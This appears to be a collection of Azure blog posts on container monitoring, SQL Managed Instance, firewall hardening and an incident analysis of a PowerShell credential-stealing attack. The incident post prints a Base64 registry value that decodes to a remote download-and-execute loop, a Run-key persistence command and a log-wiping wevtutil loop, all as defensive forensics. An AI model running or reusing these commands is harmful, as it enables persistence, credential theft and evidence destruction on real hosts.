We’ve seen an increase in container workloads running in production environments and a new wave of tooling that’s cropped up around container deployments. Microsoft Azure has a number of different partners in the container space, and today we’re featuring a new product from Sysdig: Sysdig Secure, which provides run-time container security and forensics.

Pushing container and microservice based applications into production will radically change the way you monitor and secure your environment. In this post, we’ll review the challenges of this new infrastructure and walk through examples of monitoring and securing Kubernetes on Azure Container Service with Sysdig, including:

How to instrument your Azure environment using helm with Sysdig

Best practices for leveraging Kubernetes metadata to optimize and secure your containers

How troubleshooting and forensics has changed in containerized environments

Why unify Monitoring & Security?

“The purpose and intent of DevSecOps is to build on the mindset that 'everyone is responsible for security' with the goal of safely distributing security decisions at speed and scale to those who hold the highest level of context without sacrificing the safety required.” – DevSecOps

The rise of DevSecOps has created a new role for platform operators who are in charge of providing container-based platforms as a service for their own development teams. This includes giving teams all the performance tooling they need to make sure the services they run are stable as well as secure.

These platform operators focus their workflows around two main concepts:

Visibility – what’s the performance of my service? Is my infrastructure safe?

Forensics – what happened to the deployment that crashed? What unexpected outbound connection was spawned, and what data was written to disk?

While the questions you ask for monitoring and security are different, the workflow is the same. Sysdig provides developers a unified experience for interacting with their data from a single instrumentation point, with low system and cognitive overhead.

Getting Started with Kubernetes on Azure Container Service (ACS) & Sysdig

If you’re new to ACS, check out this post for step-by-step instructions on getting Kubernetes or your favorite orchestrator up and running in minutes.

We’ll be using a Helm chart to instrument our environment, which will start the Sysdig agent on each of the hosts in the Kubernetes cluster. For more info about how Sysdig collects data from your environment, check out our How it works page.

Visibility into Kubernetes Services

Performance Monitoring

One of the best parts of Kubernetes is how extensive its internal labeling is. We take advantage of this with grouping in Sysdig Monitor. You’re able to group and explore your containers based on their physical hierarchy (for example, host > pod > container) or their logical microservice hierarchy (for example, namespace > replicaset > pod > container).

Click on each of these images and see the difference between a physical and a logical grouping to monitor your Docker containers with Kubernetes context.

If you’re interested in the utilization of your underlying physical resources (for example, identifying noisy neighbors), the physical hierarchy is great. But if you’re looking to explore the performance of your applications and microservices, the logical hierarchy is often the best place to start.

In general, the ability to regroup your infrastructure on the fly is a more powerful way to troubleshoot your environment as compared to the typical dashboard.

Securing Kubernetes Services

This same metadata can be used to protect your Kubernetes services. Using a label like kubernetes.deployment.name, we can enforce a policy that protects a logical service regardless of how many containers, hosts, or Azure regions the deployment spans.

What we’re looking at below is a policy to protect my redis Kubernetes deployment from an exfiltration event by detecting an unexpected outbound connection from that logical service. From there, we can also take actions on any policy violation to stop the container before any data has left our redis service.

Forensics in Container Environments

Forensics for troubleshooting and for incident response face the same challenge: containers are ephemeral, and the data we want is often long gone. They’re also essentially black boxes, and it’s often hard to tell what’s actually running inside them.

We don’t have time to ssh into the host and run a core dump if Kubernetes is killing our containers. Our system needs to proactively capture all activity with the ability to troubleshoot that data outside of production.

Sysdig’s unique instrumentation allows us to capture all activity from users, system calls, the network, and processes, and even content written to file or passed over the network, both pre- and post-policy violation. There is so much data here that it’s best explained in a quick one-minute video. Check out this analysis of what can happen when a user spawns a shell in a container, and all the data we can collect about their subsequent actions.

Conclusion

While the end result of your analysis might differ between monitoring and security platforms, the data and the workflow are often the same. You need to be able to view your infrastructure through a Kubernetes lens and see rich activity about everything going on in your hosts. See Sysdig’s full visibility and forensics capabilities, with a single container agent per host, in this webinar, or get started in less than 3 minutes with Helm.
Source: Azure

Put your databases on autopilot with a lift and shift to Azure SQL Database

The sheer volume of data generated today and the number of apps and databases across enterprises is staggering. To stay competitive and get ahead in today’s marketplace, IT organizations are always looking at ways to optimize how they maintain and use the data that drives their operations. Faced with constant demands for more scale and reliability amid the ongoing threat of cybersecurity attacks, IT organizations can quickly stretch their staffing and infrastructure to the breaking point. In addition to these operational issues, businesses need to look at how to best harness their data to build better apps and fuel future growth. Organizations are increasingly looking for ways to automate basic database administration tasks, from daily management to performance optimization, with best-in-class AI-driven intelligent PaaS capabilities. Azure SQL Database is the perfect choice to deliver the right mix of operational efficiencies, optimized for performance and cost, enabling you to focus on business enablement to accelerate growth and innovation.

Azure SQL Database helps IT organizations accelerate efficiencies and drive greater innovation. With built-in intelligence based on advanced machine learning technology, it is a fully-managed relational cloud database service that’s designed for SQL Server databases, built to maximize application performance and minimize the costs of running a large data estate. The latest world-class SQL Server features are available to your applications, like in-memory technologies that provide up to 30x improved throughput and latency and up to 100x performance improvement on your queries over legacy SQL Server editions. As a fully-managed PaaS service, SQL Database assumes much of the daily administration and maintenance of your databases, including the ability to scale up resources with near-zero downtime. This extends to ensuring business continuity with features like point-in-time restore and active geo-replication that help you minimize data loss with an RPO of less than 5 seconds. And, it’s supported by a financially-backed 99.99% SLA commitment. The benefits of a fully-managed SQL Database led IDC to estimate up to a 406% ROI over on-premises and hosted alternatives, making it an economical choice for your data. 

DocuSign, the global standard for eSignature and digital transaction management (DTM), wanted to scale quickly into other international markets and chose Microsoft Azure as its preferred cloud services platform. Partnering with Microsoft meant combining the best of what DocuSign does in its data center, reliable SQL Servers on flash storage, with the best of what Azure could bring to it: a global footprint, high scalability, rapid deployment and deep experience managing SQL at scale. Check out this video to learn more about DocuSign’s experience.

The right option for your workload

When considering a move to the cloud, SQL Database provides three different deployment options for your data, providing you with a range of performance levels and storage choices to suit your needs. 

 

Single databases are assigned a defined amount of resources via Basic, Standard, and Premium performance tiers. They focus on a simplified database-scoped programming model and are best for applications with a predictable usage pattern and relatively stable workload.

Elastic pools are unique to SQL Database. While they, too, have Basic, Standard and Premium performance tiers, pools are a shared resource model that enables higher resource utilization efficiency. This means that all the databases within an elastic pool share predefined resources within the same pool. Like single databases, elastic pools focus on a simplified database-scoped programming model for multi-tenant SaaS apps and are best for workload patterns that are well-defined. It’s highly cost-effective in multi-tenant scenarios.

We recently announced the upcoming fall preview for SQL Database Managed Instance, the newest deployment option in SQL Database, alongside single databases and elastic pools.

“Lift and shift” your data to the cloud 

Whereas single databases and elastic pools focus on a simplified database-scoped programming model, SQL Database Managed Instance provides an instance-scoped programming model that is modeled after, and therefore highly compatible with, on-premises SQL Server 2005 and newer. This enables a database lift-and-shift to a fully-managed PaaS, reducing or eliminating the need to re-architect your apps and manage them once in the cloud.

With SQL Database Managed Instance, you can continue to rely on the tools you have known and loved for years, in the cloud, too. This includes features such as SQL Agent, Service Broker and Common Language Runtime (CLR). But, you can also benefit from using new cloud concepts to enhance your security and business continuity to levels you have never experienced before, with minimal effort.  For example, you can use SQL Audit exactly as you always have, but now with the ability to run Threat Detection on top of that, you can proactively receive alerts around malicious activities instead of simply reacting to them after the fact.

We understand our enterprise customers and their security concerns, and are thus introducing VNET support with private IP addresses and VPN connectivity to on-premises networks in SQL Database Managed Instance, enabling full workload isolation. You can now get the benefits of the public cloud while keeping your environment isolated from the public Internet. Just as SQL Server has been the most secure database server for years, we’re doing the same in the cloud.

For organizations looking to migrate hundreds or thousands of SQL Server databases from on-premises or IaaS environments, whether self-built or ISV-provided, with as little effort as possible, Managed Instance provides a simple, secure, and economical path to modernization.

How SQL Database Managed Instance works

Managed Instance is built on the same infrastructure that’s been running millions of databases and billions of transactions daily in Azure SQL Database over the last several years. The same mechanisms for automatic backups, high availability, and security are used for Managed Instance. The key difference is that the new offering exposes entire SQL instances to customers, instead of individual databases. On a Managed Instance, all databases within the instance are located on the same SQL Server instance under the hood, just like on an on-premises SQL Server instance. This guarantees that all instance-scoped functionality works the same way, such as global temp tables, cross-database queries, SQL Agent, etc. This database placement is preserved through automatic failovers, and all server-level objects, such as logins or SQL Agent logins, are properly replicated.

Multiple Managed Instances can be placed into a so-called virtual cluster, which can then be placed into the customer’s VNET, as a customer specified subnet, and sealed off from the public internet. The virtual clusters enable scenarios such as cross-instance queries (also known as linked servers), and Service Broker messaging between different instances. Both the virtual clusters and the instances within them are dedicated to a particular customer, and are isolated from other customers, which greatly helps relax some of the common public cloud concerns.

The easiest path to SQL Database Managed Instance

The new Azure Database Migration Service (ADMS) is an intelligent, fully managed, first-party Azure service that enables seamless, frictionless migrations from heterogeneous database sources to Azure database platforms with only a few minutes of downtime. This service streamlines the tasks required to move existing third-party and SQL Server databases to Azure.

Maximize your on-premises license investments

The Azure Hybrid Benefit for SQL Server is an Azure-based benefit that helps customers maximize the value of their current on-premises licensing investments to pay a discounted rate on SQL Database Managed Instance. If you are a SQL Server Enterprise Edition or Standard Edition customer and you have Software Assurance, the Azure Hybrid Benefit for SQL Server can help you save up to 30% on Managed Instance.

Making SQL Database the best and most economical destination for your data

Running your data estate on Azure SQL Database is like putting it on autopilot: we take care of the day to day tasks, so you can focus on advancing your business. Azure SQL Database, a fully-managed, intelligent relational database service, delivers predictable performance at multiple service levels that provide dynamic scalability with minimal or no downtime, built-in intelligent optimization, global scalability and availability, and advanced security options — all with near-zero administration. These capabilities allow you to focus on rapid app development and accelerating your time to market, rather than allocating precious time and resources to managing virtual machines and infrastructure. New migration services and benefits can accelerate your modernization to the cloud and further reduce your total cost of ownership, making Azure SQL Database the best and most economical place to run SQL Server workloads.

We are so excited that these previews are almost here and look forward to hearing from you and helping you accelerate your business goals, and drive great efficiencies and innovation across your organization.
Source: Azure

Hardening Azure Analysis Services with the new firewall capability

Azure Analysis Services (Azure AS) is designed with security in mind and takes advantage of the security features available on the Azure platform. For example, integration with Azure Active Directory (Azure AD) provides a solid foundation for access control. Any user creating, managing, or connecting to an Azure Analysis Services server must have a valid Azure AD user identity. Object-level security within a model enables you to define permissions at the table, row, and column levels. Moreover, Azure AS uses encryption to help safeguard data at rest and in transit within the local data center, across data centers, between data centers and on-premises networks, as well as across public Internet connections. The combination of Transport Layer Security (TLS), Perfect Forward Secrecy (PFS), and RSA-based 2,048-bit encryption keys provides strong protection against would-be eavesdroppers.

However, keeping in mind that Azure Analysis Services is a multi-tenant cloud service, it is important to note that the service accepts network traffic from any client by default. Do not forget to harden your servers by taking advantage of basic firewall support. In the Azure Portal, you can find the firewall settings when you display the properties of your Azure AS server. Click on the Firewall tab, as the following screenshot illustrates. You must be a member of the Analysis Services Admins group to configure the firewall.

Enabling the firewall without providing any client IP address ranges effectively closes the Azure AS server to all inbound traffic—except traffic from the Power BI cloud service. The Power BI service is whitelisted in the default "Firewall on" state, but you can disable this rule if desired. Click Save to apply the changes.

With the firewall enabled, the Azure AS server responds to blocked traffic with a 401 error code. The corresponding error message informs you about the IP address that the client was using. This can be helpful if you want to grant this IP address access to your Azure AS server. This error handling is different from a network firewall in stealth mode, which does not respond to blocked traffic at all. Although the Azure AS firewall does not operate in stealth mode, it enables you to lock down your servers effectively. You can quickly verify the firewall behavior in SQL Server Management Studio (SSMS), as shown in the following screenshot.

You can also discover the client IP address of your workstation in the Azure Portal. On the Firewall page, click on Add client IP to add the current workstation IP address to the list of allowed IP addresses. Please note that the IP address is typically a public address, most likely assigned dynamically at your network access point to the Internet. Your client computer might not always use the same IP address. For this reason, it is usually advantageous to configure an IP range instead of an individual address. See the following table for examples. Note that you must specify addresses in IPv4 format.

Name                    Start IP Address   End IP Address   Comments
ClientIPAddress         192.168.1.1        192.168.1.1      Grants access to exactly one IP address.
ClientIPAddresses       192.168.1.0        192.168.1.254    Grants access to all IP addresses in the 192.168.1.x subnet.
US East 2 Data Center   23.100.64.1        23.100.71.254    This is the address range 23.100.64.0/21 from the US East 2 data center.

Besides Power BI and client computers in on-premises networks, you might also want to grant specific Azure-based solutions access to your Azure AS server. For example, you could be using a solution based on Azure Functions to perform automated processing or other actions against Azure AS. If the Azure AS firewall blocks your solution, you will encounter the error message, “System.Net.WebException: The remote server returned an error: (401) Unauthorized.” The following screenshot illustrates the error condition.

In order to grant the Azure App Service access to your Azure AS server, you must determine the IP address that your function app uses. In the properties of your function app, copy the outbound IP addresses (see the following screenshot) and add them to the list of allowed client IP addresses in your firewall rules.

Perhaps you are wondering at this point how to open an Azure AS server to an entire data center. This is slightly more complicated because the Azure data center address ranges are dynamic. You can download an XML file with the list of IP address ranges for all Azure data centers from the Microsoft Download Center. This list is updated on a weekly basis, so make sure you check for updates periodically.

Note that the XML file uses the classless inter-domain routing (CIDR) notation, while the Azure AS Firewall settings expect the ranges to be specified with start and end IP address. To convert the CIDR format into start and end IP addresses, you can use any of the publicly available IP converter tools. Alternatively, you can process the XML file by using Power Query, as the following screenshot illustrates.
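
If you prefer code over Power Query, the conversion is simple arithmetic on the 32-bit address; here is a small, self-contained C# helper (illustrative, not part of the workbook):

using System;
using System.Net;

class CidrRange
{
    // Convert a CIDR block such as "23.100.64.0/21" into start and end IPv4 addresses.
    static (string Start, string End) ToRange(string cidr)
    {
        string[] parts = cidr.Split('/');
        // Address bytes arrive in network (big-endian) order; reverse for arithmetic on little-endian hosts.
        uint baseAddr = BitConverter.ToUInt32(ReverseBytes(IPAddress.Parse(parts[0]).GetAddressBytes()), 0);
        int prefix = int.Parse(parts[1]);
        uint mask = prefix == 0 ? 0u : uint.MaxValue << (32 - prefix);
        uint start = baseAddr & mask; // network address
        uint end = start | ~mask;     // broadcast address
        return (new IPAddress(ReverseBytes(BitConverter.GetBytes(start))).ToString(),
                new IPAddress(ReverseBytes(BitConverter.GetBytes(end))).ToString());
    }

    static byte[] ReverseBytes(byte[] bytes) { Array.Reverse(bytes); return bytes; }

    static void Main()
    {
        var (start, end) = ToRange("23.100.64.0/21");
        Console.WriteLine($"{start} - {end}"); // 23.100.64.0 - 23.100.71.255
    }
}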

Download the Excel workbook and make sure you update the XmlFilePath parameter to point to the XML file you downloaded. For your convenience, the workbook includes a column called Firewall Rule Added, which concatenates the data center information into firewall rules as they would be defined in an Azure Resource Manager (ARM) template. The following screenshot shows an ARM template with several rules that grant IP address ranges from the US East 2 data center access to an Azure AS server.

The ARM template makes it easy to apply a large list of rules programmatically by using Azure PowerShell, the Azure Command Line Interface (CLI), the Azure portal, or the Resource Manager REST API. However, an excessively long list of IP addresses is hard to manage. Moreover, the Azure AS firewall must evaluate each rule for every incoming request. For this reason, it is recommended to limit the number of rules to the minimum necessary. For example, avoid adding approximately 3,500 rules for all IP ranges across all Azure data centers. Even if you limit the rules to your server's local data center, there may still be more than 400 subnets. As a best practice, build your Azure AS business solutions using technologies that support static IP addresses, or at least a small set of dynamic IP addresses, as is the case with the Azure App Service. The smaller the surface area, the more effective the hardening of your Azure AS server.
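As a quick illustration, applying such a template with Azure PowerShell takes a single cmdlet. The resource group and file names below are placeholders:

# Deploy the firewall-rule template to the resource group that contains the Azure AS server.
New-AzureRmResourceGroupDeployment -ResourceGroupName 'my-aas-rg' -TemplateFile '.\azure-as-firewall.json'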

Submit your own ideas for features on our feedback forum and learn more about Azure Analysis Services.
Source: Azure

How Azure Security Center unveils suspicious PowerShell attack

In honor of National Cybersecurity Awareness Month (NCSAM), we have a new post in our series highlighting real-world attacks that Azure Security Center helped detect, investigate, and mitigate. This post is about an attack which used PowerShell to run malicious code and collect user credentials. But before we jump in, here’s a recap of other blog posts in our series where Security Center detected a:

SQL Brute Force attack
Bitcoin mining attack
DDoS attack using cyber threat intelligence
Good applications being used maliciously

In this post, we’ll walk through another interesting real-world attack scenario which was detected by Azure Security Center and investigated by our team. Names of the affected company, all computer names, and all usernames have been changed to protect privacy. This particular attack employed the use of PowerShell to run malicious code in-memory with the goal of collecting credential information through password stealing, keystroke logging, clipboard scraping, and screen captures. We’ll map out the stages of the compromise, which began with an RDP Brute Force attack and resulted in the setup and configuration of persistent auto-starts (ASEP) in the registry. This case study provides insights into the dynamics of the attack and recommendations on how to detect and prevent similar attacks in your environment.

Initial Azure Security Center alert and details

As long as remote administration of internet-connected computers has been around, hackers have tried to discover exposed remote admin services, such as Remote Desktop Protocol (RDP), so that they can crack passwords through brute force attacks. Our case begins in a large customer's Azure Security Center console, where they were alerted to RDP brute force activity as well as suspicious PowerShell activity.

In the Azure Security Center screenshot below, you can track the chronological progression from bottom to top as “Failed RDP Brute Force Attack” alerts are followed by a single “Successful RDP Brute Force Attack” alert – an indication that someone logged on via RDP after having guessed a user password. This malicious Brute Force logon is subsequently followed by several alerts for unusual PowerShell activity.

As we examine the initial Successful RDP Brute Force Attack alert, we see the time of the attack, the account that was compromised, the attacking IP address where the attempts originated from (Italy in our case), and a link to Microsoft’s Threat Intel “RDP Brute Forcing” report.

After the successful logon, as we drill down to the subsequent High severity alerts, Azure Security Center chronologically reveals each command line launched by the attacker once they successfully logged on:

Initial compromise and details of attacker activity

Armed with the information provided by the alerts, our investigative team worked with the customer to examine Account Logon logs (Event ID 4624) and Process Creation logs (Event ID 4688) taken from the time the attacker initially logged on. From the earliest logon data, we see continual RDP brute force attempts using a variety of username and password combinations. Most of these failed attempts result in Event ID 4625 (An account failed to log on), with a Status code of 0xc000006d (The attempted logon is invalid), and a Substatus code of 0xc0000064 (The specified account does not exist).

Around 10:13 AM on 09-06, we begin to see a change in the Substatus code. We now see the use of the username "ContosoAdmin" resulting in a different status code: 0xc000006a (Wrong password). This is followed by a successful type 3 (Network) logon and a type 10 (RemoteInteractive) logon using the account "ContosoAdmin". The logon appears to originate from an IP address in Italy (188.125.100.233).
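For reference, here is one generic way to pull the same failed-logon records (Event ID 4625) from a host's Security log with PowerShell. This is a sketch for your own triage, not the tooling our team used, and it assumes an elevated session on the examined host:

# List recent failed logons with the target account, status codes, and source IP address.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625 } -MaxEvents 50 | ForEach-Object {
    $xml = [xml]$_.ToXml()
    $data = $xml.Event.EventData.Data
    [pscustomobject]@{
        Time      = $_.TimeCreated
        Account   = ($data | Where-Object Name -eq 'TargetUserName').'#text'
        Status    = ($data | Where-Object Name -eq 'Status').'#text'
        SubStatus = ($data | Where-Object Name -eq 'SubStatus').'#text'
        SourceIP  = ($data | Where-Object Name -eq 'IpAddress').'#text'
    }
}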

Looking at Process Creation activity after the logon, we see that the attacker first issues the "whoami" command, which displays the currently logged-on user. They then list the members of the "Domain Admins" group with the command net group "Domain Admins" /domain. This is followed by the "qwinsta" command, which displays all Remote Desktop Services sessions. Taskmgr (Windows Task Manager) is then launched to view or manage processes and services.

About a minute later, another PowerShell command is executed. This command is obfuscated with Base64-encoded strings that are additionally wrapped in a Deflate compression layer.

Note: We’ll be digging further into what this command does as we decode the Base64 later in this blog.
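For analysts who want to unwrap a similar payload themselves, the decoding is mechanical. The sketch below assumes the captured string sits in a placeholder variable $encoded and that the inner stream is ASCII text, which is common but not guaranteed:

# $encoded is a placeholder for the attacker's Base64 string.
$bytes = [Convert]::FromBase64String($encoded)

# Reverse the Deflate compression layer wrapped around the decoded bytes.
$memory  = New-Object System.IO.MemoryStream -ArgumentList @(, $bytes)
$deflate = New-Object System.IO.Compression.DeflateStream -ArgumentList $memory, ([System.IO.Compression.CompressionMode]::Decompress)
$reader  = New-Object System.IO.StreamReader -ArgumentList $deflate, ([System.Text.Encoding]::ASCII)

# The output is the next layer of (often still obfuscated) PowerShell.
$reader.ReadToEnd()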

About three minutes later, the attacker logs off the machine. But before logging off, they attempt to cover their tracks by clearing all event logs. This is done with the built-in wevtutil.exe (Windows Events Command Line Utility). First, all event logs are enumerated with the "el" (enum-logs) switch. Then all event logs are cleared with the "cl" (clear-log) switch. Below is a portion of the event-clearing commands launched by the attacker.
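In essence, the pattern is a simple enumerate-then-clear loop. Reconstructed for illustration only (it is destructive; do not run it outside a lab), it amounts to:

# Enumerate every event log name, then clear each log in turn.
wevtutil.exe el | ForEach-Object { wevtutil.exe cl $_ }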

A closer look at the Base64 encoded PowerShell command

Decoding the Base64-encoded portion of the attacker's initial command turns up yet more Base64-encoded commands, which reveal:

Nested Base64 obfuscation.
All levels of the command executions are obfuscated.
Creation of a registry-only ASEP (Auto-Start Extensibility Point) as a persistence mechanism.
Malicious code parameters stored in the registry.
Command execution occurs "in-memory" with no file or NTFS artifacts, since the ASEP and the parameters exist only in the system registry.

Here’s the initial command issued by the attacker:

Decoding the Base64 reveals registry entries and more Base64 strings to decode…

Decoding these nested Base64 values, we determine that the command does the following:

The command first stores parameter information, for subsequent commands to read, in a registry value named "SeCert" under HKLM\Software\Microsoft\Windows\CurrentVersion.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion]
"SeCert"="dwBoAGkAbABlACgAMQApAHsAdAByAHkAewBJAEUAWAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALg
BEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBkAG0AcwBlAHIAdgBlAHIAcwAuAGMAbwBtAC8AJwArACgAWwBjAGgAYQBy
AF0AKAA4ADUALQAoAC0AMwA3ACkAKQApACkAfQBjAGEAdABjAGgAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAfQB9AA=="

The Base64 value in the above registry key decodes to a download command from a malicious C2 (Command and Control) domain (mdmservers[.]com).

while(1){try{IEX(New-Object Net.WebClient).DownloadString('hxxp[:]//mdmservers[.]com/'+([char](85-(-37))))}catch{Start-Sleep -s 10}}
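Note the small arithmetic twist at the end of the URL: the [char] expression hides a single letter from casual inspection.

[char](85 - (-37))   # 85 + 37 = 122, the ASCII code for 'z'

So the download target is effectively 'hxxp[:]//mdmservers[.]com/z'.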

The attacker's command then creates a persistence mechanism through a registry ASEP (Auto-Start Extensibility Point) named "SophosMSHTA" under the HKLM\Software\Microsoft\Windows\CurrentVersion\Run key.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SophosMSHTA"="mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -c ""$x=$((gp HKLM:\Software\Microsoft\Windows\CurrentVersion SeCert).SeCert);powershell -E $x""",0,True)(window.close)"

This registry persistence ensures that the malicious commands are launched every time the machine is started or restarted.
The registry ASEP launches the Microsoft Scripting Engine (mshta.exe).
Mshta.exe, in turn, runs PowerShell.exe, which then reads and decodes the value of HKLM\Software\Microsoft\Windows\CurrentVersion -> "SeCert".
The registry value of "SeCert" tells PowerShell to download and launch a malicious script from 'hxxp[:]//mdmservers[.]com'.

Malicious code downloaded and executed

Once the attacker has set up the persistence mechanism and logged off, the next restart of the host machine launches PowerShell to download and launch a malicious payload from 'hxxp[:]//mdmservers[.]com'. This malicious script contains various sections that perform specific functions. The table below details the main functions of the malicious payload.

Actions

Scrapes content from the clipboard and saves the output to %temp%\Applnsights_VisualStudio.txt
Captures all keystrokes to %temp%\key.log
Takes an initial screen capture and saves a .jpg to %temp%\F28DD9-0677-4EAC-91B8-2112B1515341yyyymmdd_hhmmss.jpg
Takes subsequent screen captures when certain financial or account credential related keywords are typed, and saves a .jpg to %temp%\F28DD9-0677-4EAC-91B8-2112B1515341yyyymmdd_hhmmss.jpg
Checks if the Google Chrome browser is installed. If so, collects all passwords from the Chrome cache and saves them to %temp%\Chrome.log
Checks if the Mozilla Firefox browser is installed. If so, collects all passwords from the Firefox cache and saves them to %temp%\Firefox.log

Putting it all together

So, let’s summarize what we’ve seen so far in this investigation:

Initial ingress occurs when an admin account is compromised in a successful RDP Brute Force attack.
The attacker then executes a Base64-obfuscated PowerShell command that sets up a registry ASEP which launches at boot time.
The attacker then clears evidence of their activity by deleting all event logs with the command: wevtutil.exe cl <eventlogname>.
When the affected host is started or rebooted, it launches the malicious registry ASEP at HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
The registry ASEP launches the Microsoft Scripting Engine (mshta.exe).
Mshta.exe, in turn, runs PowerShell.exe, which then reads and decodes the value of HKLM\Software\Microsoft\Windows\CurrentVersion -> "SeCert".
The registry value of "SeCert" tells PowerShell to download and launch a malicious script from 'hxxp[:]//mdmservers[.]com'.
The malicious code from hxxp[:]//mdmservers[.]com then does the following:

Scrapes content from the clipboard to: %temp%\Applnsights_VisualStudio.txt
Captures all keystrokes to: %temp%\key.log
Takes an initial screen capture and saves a .jpg to: %temp%\F28DD9-0677-4EAC-91B8-2112B1515341yyyymmdd_hhmmss.jpg
Takes subsequent screen captures when certain financial or account credential related keywords are typed, and saves a .jpg to: %temp%\F28DD9-0677-4EAC-91B8-2112B1515341yyyymmdd_hhmmss.jpg
Checks if the Google Chrome browser is installed. If so, collects all passwords from the Chrome cache and saves them to: %temp%\Chrome.log
Checks if the Mozilla Firefox browser is installed. If so, collects all passwords from the Firefox cache and saves them to: %temp%\Firefox.log

The result of this attack is information-stealing malware that automatically launches from the registry, runs in memory, and collects keystrokes, browser passwords, clipboard data, and screenshots.

How Azure Security Center caught it all

It is evident that the attacker went to extraordinary lengths to conceal their activity: ensuring all process executions used built-in Windows executables (PowerShell.exe, Mshta.exe, Wevtutil.exe), obfuscating command parameters and storing them in the registry, and deleting all event logs to cover their tracks. This effort, however, did not prevent Azure Security Center from detecting, collecting, and reporting this malicious activity.

As we saw at the beginning of this blog, Azure Security Center detected all stages of this attack, providing details of the initial RDP Brute Force attack and revealing all commands issued by the attacker at the various stages. You'll also notice in the alerts that all obfuscated command lines were deciphered, decoded, and presented in clear text at each stage of the attack. This valuable, time-saving information helps security response investigators and system administrators answer questions like "What happened?", "When did this happen?", "How did they get in?", "What did they do when they got in?", and "Where did they come from?". Additionally, investigators can determine whether other hosts in their organization may have been compromised through lateral movement from this compromised host. Seeing the bigger picture of this attack can also help answer motive questions like "What were they after?" In our case, the primary purpose appears to have been credential stealing for financial or intellectual gain.

In all of our investigations, Azure Security Center played a pivotal role in helping to determine critical details such as the initial ingress/compromise vector, the source of the attack, possible lateral movement, and the scope of the attack. Security Center also details artifacts that can be lost over time due to filesystem overwrites or log retention and storage limitations. Azure Security Center's ability to ingest, store, analyze, and decipher data from various sources using the latest machine learning and big data analytics makes it invaluable to security analysts, incident responders, and forensic professionals alike.

Recommended remediation and mitigation steps

The initial compromise was the result of a successful RDP Brute Force attack on a user account that had an easily guessed password, which led to the complete compromise of the affected host machine. In this case, the host was configured with malicious PowerShell code whose primary purpose was credential stealing for financial or intellectual gain. Microsoft recommends investigating the source of the initial compromise via a review of available log sources, host-based analysis, and, if needed, forensic analysis to help build a picture of the compromise. In the case of Azure Infrastructure as a Service (IaaS) and Virtual Machines (VMs), several features are available to facilitate the collection of data, including the ability to attach data drives to a running machine and disk imaging capabilities. Microsoft also recommends performing a scan using malware protection software to help identify and remove any malicious software running on the host. If lateral movement from the compromised host has been identified, remediation actions should extend to those hosts as well.

For cases where the victim host cannot be confirmed clean, or a root cause of the compromise cannot be identified, Microsoft recommends backing up critical data and migrating to a new virtual machine. Additionally, new or remediated hosts should be hardened prior to being placed back on the network to prevent reinfection. However, with the understanding that this sometimes cannot be done immediately, we recommend implementing the following remediation/preventative steps:

Password Policy: Attackers usually launch brute force attacks using widely available tools that rely on wordlists and smart rule sets to guess user passwords automatically. The first step, then, is to use complex passwords for all VMs. A complex password policy that enforces frequent password changes should be in place. Learn more about the best practices for enforcing password policies.
Endpoints: Endpoints allow communication with your VM from the Internet. When creating a VM in the Azure environment, two endpoints are created by default to help manage the VM: Remote Desktop and PowerShell. It is recommended to remove any endpoints that are not needed and to add them only when required. If you do have an endpoint open, it is recommended to change the public port that is used whenever possible. When creating a new Windows VM, the public port for Remote Desktop is set to "Auto" by default, which means a random public port is generated for you automatically. Get more information on how to set up endpoints on a classic Windows virtual machine in Azure.
Enable Network Security Group: Azure Security Center recommends that you enable a network security group (NSG), if it’s not already enabled. NSGs contain a list of Access Control List (ACL) rules that allow or deny network traffic to your VM instances in a Virtual Network. An endpoint ACL allows you to control which IP address, or CIDR subnet of addresses, you want to allow access over that management protocol. Learn more about how to filter network traffic with network security groups and enable Network Security Groups in Azure Security Center.
Using VPN for management: A VPN gateway is a type of virtual network gateway that sends encrypted traffic across a public connection to an on-premises location. You can also use VPN gateways to send encrypted traffic between Azure virtual networks over the Microsoft network. To send encrypted network traffic between your Azure virtual network and on-premises site, you must create a VPN gateway for your virtual network. Both Site-to-Site and Point-to-Site gateway connections allow you to completely remove public endpoints and connect directly to the virtual machine over a secure VPN connection.
Network Level Authentication (NLA): NLA can be used on the host machine to allow Remote Desktop session creation only by domain-authenticated users. Because NLA requires the connecting user to authenticate before a session is established with the server, brute force, dictionary, and password-guessing attacks are mitigated (a quick verification sketch follows this list).
Just In Time (JIT) Network Access: Just-in-time virtual machine (VM) access in Azure Security Center can be used to help secure and lock down inbound traffic to your Azure VMs. JIT network access reduces exposure to brute force attacks by limiting the amount of time that a port is open, while still providing easy access for connecting to VMs when needed.
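As a quick check for the NLA recommendation above, the following sketch reads the UserAuthentication registry value that controls NLA for the default RDP listener (1 means NLA is enforced). It assumes an elevated PowerShell session on the host:

# Check whether Network Level Authentication is required for RDP on this host.
$rdp = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
if ($rdp.UserAuthentication -eq 1) {
    'NLA is already enforced.'
} else {
    # Require NLA for new RDP connections.
    Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name 'UserAuthentication' -Value 1
    'NLA was off and has now been enabled.'
}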

For more information on the malicious script and its output, see the following:

A most interesting PowerShell trojan [PowerShell sample and Raw Paste data provided by @JohnLaTwC]
Windows Defender Malware Encyclopedia Entry: Spyware:PowerShell/Tripelog

To learn more about Azure Security Center, see the following:

Azure Security Center’s detection capabilities
Managing and responding to security alerts in Azure Security Center
Managing security recommendations in Azure Security Center
Security health monitoring in Azure Security Center
Monitoring partner solutions with Azure Security Center
Azure Security Center FAQ
Get the latest Azure security news and information by reading the Azure Security blog.

Source: Azure

Announcing Azure Database for MySQL and PostgreSQL availability in Canada and Brazil

